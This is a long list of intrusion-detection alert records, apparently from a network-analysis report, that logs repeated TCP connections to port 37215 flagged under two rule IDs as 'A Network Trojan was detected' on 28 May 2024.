            SID:2829579
            Source Port:34904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326706
            SID:2829579
            Source Port:42692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892201
            SID:2829579
            Source Port:40600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047957
            SID:2829579
            Source Port:49924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058568
            SID:2835222
            Source Port:34376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771595
            SID:2835222
            Source Port:40692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905326
            SID:2829579
            Source Port:36774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697833
            SID:2829579
            Source Port:51120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066839
            SID:2829579
            Source Port:44476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853866
            SID:2835222
            Source Port:45436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744011
            SID:2829579
            Source Port:43094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879909
            SID:2829579
            Source Port:37056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473491
            SID:2835222
            Source Port:34788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955856
            SID:2835222
            Source Port:48606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435585
            SID:2829579
            Source Port:46352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282696
            SID:2835222
            Source Port:54230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808264
            SID:2835222
            Source Port:37994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547621
            SID:2835222
            Source Port:60636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933394
            SID:2829579
            Source Port:38562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.347719
            SID:2829579
            Source Port:50036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746329
            SID:2835222
            Source Port:53010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027001
            SID:2835222
            Source Port:48024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413048
            SID:2829579
            Source Port:40814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543954
            SID:2835222
            Source Port:58808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.068704
            SID:2829579
            Source Port:41802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919952
            SID:2835222
            Source Port:48356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582779
            SID:2835222
            Source Port:34956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847058
            SID:2829579
            Source Port:37266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955580
            SID:2835222
            Source Port:48190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956786
            SID:2835222
            Source Port:40048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459585
            SID:2835222
            Source Port:35756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.443836
            SID:2829579
            Source Port:47476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047619
            SID:2835222
            Source Port:50546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776769
            SID:2829579
            Source Port:51028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995870
            SID:2835222
            Source Port:46740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867133
            SID:2829579
            Source Port:52712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506661
            SID:2829579
            Source Port:38896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771139
            SID:2829579
            Source Port:37180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790619
            SID:2829579
            Source Port:35502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.564011
            SID:2835222
            Source Port:53724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856449
            SID:2829579
            Source Port:45358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026640
            SID:2835222
            Source Port:41858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605135
            SID:2829579
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901355
            SID:2829579
            Source Port:34886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565676
            SID:2829579
            Source Port:45216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312018
            SID:2835222
            Source Port:37680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880818
            SID:2835222
            Source Port:39806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444944
            SID:2829579
            Source Port:43044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581684
            SID:2835222
            Source Port:38584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.613064
            SID:2829579
            Source Port:38536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789216
            SID:2829579
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998006
            SID:2835222
            Source Port:46326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575076
            SID:2829579
            Source Port:51020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.351840
            SID:2835222
            Source Port:37616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.820253
            SID:2835222
            Source Port:37386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871759
            SID:2829579
            Source Port:34728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.627861
            SID:2835222
            Source Port:48730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765669
            SID:2835222
            Source Port:55430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553456
            SID:2829579
            Source Port:50700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779077
            SID:2835222
            Source Port:56782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768087
            SID:2829579
            Source Port:49908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005152
            SID:2835222
            Source Port:57544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563467
            SID:2835222
            Source Port:59334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898928
            SID:2835222
            Source Port:34278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062735
            SID:2835222
            Source Port:55780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733246
            SID:2835222
            Source Port:46414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810912
            SID:2829579
            Source Port:34076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988102
            SID:2835222
            Source Port:52724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919773
            SID:2829579
            Source Port:59888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989607
            SID:2835222
            Source Port:40370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856378
            SID:2829579
            Source Port:49700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.136282
            SID:2835222
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.829046
            SID:2835222
            Source Port:57182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929986
            SID:2829579
            Source Port:43660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961530
            SID:2835222
            Source Port:51322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026811
            SID:2835222
            Source Port:52342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024541
            SID:2835222
            Source Port:58966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777262
            SID:2835222
            Source Port:58654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856407
            SID:2835222
            Source Port:42186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766647
            SID:2835222
            Source Port:50304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912230
            SID:2829579
            Source Port:50444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773703
            SID:2829579
            Source Port:33432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.288978
            SID:2829579
            Source Port:47758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751536
            SID:2835222
            Source Port:44442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604681
            SID:2835222
            Source Port:49306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.149899
            SID:2829579
            Source Port:56560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051275
            SID:2835222
            Source Port:50688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599649
            SID:2829579
            Source Port:33234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107825
            SID:2829579
            Source Port:44948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912260
            SID:2829579
            Source Port:45024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926996
            SID:2835222
            Source Port:41438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665397
            SID:2829579
            Source Port:37466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731544
            SID:2835222
            Source Port:36536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004860
            SID:2829579
            Source Port:36218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320471
            SID:2835222
            Source Port:38376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998027
            SID:2829579
            Source Port:44678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261711
            SID:2829579
            Source Port:38152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190192
            SID:2829579
            Source Port:50022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941994
            SID:2829579
            Source Port:58910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290666
            SID:2829579
            Source Port:44574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722257
            SID:2835222
            Source Port:36672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.013886
            SID:2829579
            Source Port:44950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805590
            SID:2829579
            Source Port:37186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909930
            SID:2835222
            Source Port:49076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956680
            SID:2829579
            Source Port:60734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961070
            SID:2835222
            Source Port:42336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910849
            SID:2829579
            Source Port:49732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020629
            SID:2835222
            Source Port:36594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.606308
            SID:2835222
            Source Port:47028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383607
            SID:2829579
            Source Port:56046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559827
            SID:2835222
            Source Port:37230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251321
            SID:2835222
            Source Port:53938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990051
            SID:2835222
            Source Port:54468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302225
            SID:2829579
            Source Port:36406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957596
            SID:2835222
            Source Port:42468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.660891
            SID:2835222
            Source Port:60294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864904
            SID:2829579
            Source Port:49620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001077
            SID:2829579
            Source Port:36620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788860
            SID:2835222
            Source Port:57462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729462
            SID:2829579
            Source Port:47026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909955
            SID:2835222
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772971
            SID:2829579
            Source Port:33188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052988
            SID:2835222
            Source Port:38356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060045
            SID:2829579
            Source Port:59708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912804
            SID:2835222
            Source Port:47768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761135
            SID:2829579
            Source Port:48222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060079
            SID:2829579
            Source Port:53272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565182
            SID:2829579
            Source Port:58452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.385873
            SID:2835222
            Source Port:48592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020505
            SID:2835222
            Source Port:36676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064682
            SID:2829579
            Source Port:50180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661762
            SID:2829579
            Source Port:51318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.949002
            SID:2835222
            Source Port:42574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818311
            SID:2829579
            Source Port:56632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.459305
            SID:2829579
            Source Port:59756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879163
            SID:2835222
            Source Port:50896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048080
            SID:2829579
            Source Port:55932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863798
            SID:2829579
            Source Port:47918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882076
            SID:2835222
            Source Port:48556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910151
            SID:2835222
            Source Port:36152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565594
            SID:2829579
            Source Port:57084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871738
            SID:2835222
            Source Port:45262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854249
            SID:2835222
            Source Port:43112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057818
            SID:2835222
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998278
            SID:2829579
            Source Port:58998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665676
            SID:2835222
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.190676
            SID:2835222
            Source Port:48982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919393
            SID:2835222
            Source Port:37950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842617
            SID:2829579
            Source Port:47166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056809
            SID:2829579
            Source Port:51758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722072
            SID:2835222
            Source Port:52924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442742
            SID:2829579
            Source Port:33338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308183
            SID:2829579
            Source Port:42466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.487288
            SID:2835222
            Source Port:38330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.326207
            SID:2835222
            Source Port:41324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.641305
            SID:2835222
            Source Port:38746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870284
            SID:2835222
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384036
            SID:2835222
            Source Port:48618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038950
            SID:2829579
            Source Port:51438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956804
            SID:2829579
            Source Port:47166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676648
            SID:2835222
            Source Port:40284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.553784
            SID:2829579
            Source Port:37366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897378
            SID:2829579
            Source Port:39900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789483
            SID:2835222
            Source Port:36842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809899
            SID:2829579
            Source Port:38672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261597
            SID:2835222
            Source Port:38102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046054
            SID:2829579
            Source Port:38124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.618357
            SID:2829579
            Source Port:35966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850884
            SID:2835222
            Source Port:59368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815251
            SID:2835222
            Source Port:55940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855957
            SID:2835222
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.636772
            SID:2829579
            Source Port:35234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079179
            SID:2829579
            Source Port:54294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948199
            SID:2829579
            Source Port:33842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.974989
            SID:2835222
            Source Port:54208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014617
            SID:2829579
            Source Port:35070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486867
            SID:2835222
            Source Port:49614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854909
            SID:2835222
            Source Port:57592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704511
            SID:2835222
            Source Port:48208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843061
            SID:2829579
            Source Port:36636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.835926
            SID:2829579
            Source Port:39026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436353
            SID:2829579
            Source Port:49408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072612
            SID:2829579
            Source Port:46964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543260
            SID:2835222
            Source Port:48610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862276
            SID:2829579
            Source Port:59480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917629
            SID:2835222
            Source Port:52874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682128
            SID:2829579
            Source Port:56490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569401
            SID:2835222
            Source Port:45064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851099
            SID:2835222
            Source Port:53286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.953177
            SID:2835222
            Source Port:48008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050992
            SID:2829579
            Source Port:50970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314070
            SID:2829579
            Source Port:38520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610501
            SID:2829579
            Source Port:47328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261571
            SID:2835222
            Source Port:58682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808164
            SID:2829579
            Source Port:52476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941636
            SID:2829579
            Source Port:53508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251819
            SID:2829579
            Source Port:45632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935163
            SID:2829579
            Source Port:37214
            Destination Port:37215
